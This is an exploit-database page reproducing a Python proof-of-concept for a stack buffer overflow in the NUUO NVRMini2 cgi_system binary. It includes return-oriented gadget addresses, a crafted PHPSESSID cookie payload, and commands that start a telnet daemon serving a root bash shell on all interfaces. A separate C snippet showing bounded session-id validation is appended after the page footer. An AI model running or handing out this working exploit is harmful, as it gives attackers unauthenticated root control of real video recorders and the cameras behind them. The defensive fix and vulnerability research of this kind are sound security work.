0day.today - Biggest Exploit Database in the World.
NUUO NVRMini2 3.8 - cgi_system Buffer Overflow (Enable Telnet) Exploit
```python
# Exploit Title: NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.nuuo.com/
# Device: NVRMini2
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Versions: 3.8.0 and below
# Tested Against: 03.07.0000.0011 and 03.08.0000.0005
# Tested on: Ubuntu and OSX
# CVE: N/A
# TRA: https://www.tenable.com/security/research/tra-2018-25
# Description:
# A stack buffer overflow exists in the cgi_system binary. The error occurs
# due to lack of bounds checking on the PHPSESSID value before and when
# it is passed to sprintf in order to generate the session id file name.
# As written, this exploit enables Telnet.

# Executes a command via the stack buffer overflow in cookie parsing. The command
# is executed via 'system' as root. The overflow logic is like so:
#
# address 1: 405e2e34 - load system into r3 and address 2 into lr
#
# .text:000D0E34 0F 48 BD E8 LDMFD SP!, {R0-R3,R11,LR}
# .text:000D0E38 1E FF 2F E1 BX LR
#
# address 2: 406037cc - load the system command into r0. Jump to system.
#
# .text:000F17CC 0D 00 A0 E1 MOV R0, SP
# .text:000F17D0 33 FF 2F E1 BLX R3
#
# [ address 1 ][ r0 ][ r1 ][ r2 ][ r3 system ][ r11 ][ LR - addr2 ][ system command ]
# \x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40touch /tmp/lolwat

# PoC (Python 2)
import requests
import socket
import sys


def stack_buffer_overflow(command, ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print '[+] Executing %s on %s:%s...' % (command, ip, port)
    sock.connect((ip, int(port)))
    exec_request = ('GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' +
                    'Host: ' + ip + ':' + port + '\r\n' +
                    'Accept: */*\r\n' +
                    'Cookie: PHPSESSID=982e6c010064b3878a4b793bfab8d2d2' +
                    'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDD' +
                    '\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40' +
                    command + '\r\n\r\n')
    sock.sendall(exec_request)
    data = sock.recv(1024)
    sock.close()

    # We should get a 500 Internal error in response
    return data.find('500') != -1


# Quickly tries to grab the version of the target. If the target is
# using anything other than 3.7 or 3.8 then we'll bail out since we
# haven't tested on any other targets
def check_target(ip, port):
    index = requests.get('http://' + ip + ':' + port + "/upgrade_handle.php?cmd=getcurrentinfo")
    return (index.text.find('<Titan>03.08') != -1 or
            index.text.find('<Titan>03.07') != -1)


if __name__ == "__main__":
    if (len(sys.argv) != 3):
        print "Usage: python nvrmini2_enable_telnet.py <ipv4 address> <port>"
        sys.exit(1)

    ip = sys.argv[1]
    port = sys.argv[2]

    if int(port) > 65535:
        print('[-] Invalid port parameter')
        sys.exit(0)

    if len(ip.split('.')) != 4:
        print('[-] Invalid IP address parameter')
        sys.exit(0)

    print '[+] Checking for a valid target...'
    if (check_target(ip, port) == False):
        print("[-] The target is not a NVRMini2 or it's using an untested version.")
        sys.exit(0)

    print '[+] Valid target!'
    if (stack_buffer_overflow('mount -t devpts devpts /dev/pts', ip, port) == False):
        print('[-] Mount failed')
        sys.exit(0)

    if (stack_buffer_overflow('/bin/sh -c "/usr/sbin/telnetd -l /bin/bash -b 0.0.0.0"&', ip, port) == False):
        print('[-] telnetd bind failed')
        sys.exit(0)

    print('[+] Success!')
```

# 0day.today [2024-09-28] #
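The root cause described in the header is an unbounded sprintf of the PHPSESSID cookie into a stack buffer. The following is an added example of the defensive side, not the vendor's code (the cgi_system source is not on this page): the untrusted session id is validated before any copy and the file name is built with a length-bounded formatter whose result is checked, so an over-long cookie is rejected instead of overrunning the buffer. SESSION_DIR, the buffer sizes and the function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed values: the real session directory and buffer size used by
 * cgi_system are not on the page. */
#define SESSION_DIR "/tmp/"
#define SESSID_LEN  32   /* PHP session ids, as in the PoC cookie, are 32 hex chars */

/* The advisory describes the vulnerable shape as, roughly:
 *     char path[N];
 *     sprintf(path, SESSION_DIR "sess_%s", sessid);   // no bounds check
 * so a cookie longer than the space left after the prefix runs off the end
 * of the stack buffer. The fix below validates the id before any copy and
 * then uses a length-bounded formatter whose return value is checked. */

/* Returns 1 if sessid is exactly SESSID_LEN hex digits, 0 otherwise.
 * Over-long input is rejected as soon as it is detected, without scanning on. */
int valid_sessid(const char *sessid)
{
    size_t i;
    for (i = 0; sessid[i] != '\0'; i++) {
        if (i >= SESSID_LEN)
            return 0;                       /* too long */
        if (!isxdigit((unsigned char)sessid[i]))
            return 0;                       /* not a session id character */
    }
    return i == SESSID_LEN;
}

/* Builds the session file path into out (capacity outlen). Returns 0 on success
 * and -1 for a malformed id or an undersized buffer; out is never overrun. */
int build_session_path(const char *sessid, char *out, size_t outlen)
{
    if (!valid_sessid(sessid))
        return -1;
    int n = snprintf(out, outlen, "%ssess_%s", SESSION_DIR, sessid);
    if (n < 0 || (size_t)n >= outlen) {     /* truncated: treat as an error */
        if (outlen > 0)
            out[0] = '\0';
        return -1;
    }
    return 0;
}
```

The 32-character id in the PoC cookie passes validation, while the same id followed by the padding bytes the exploit appends is rejected before sprintf-style formatting ever runs.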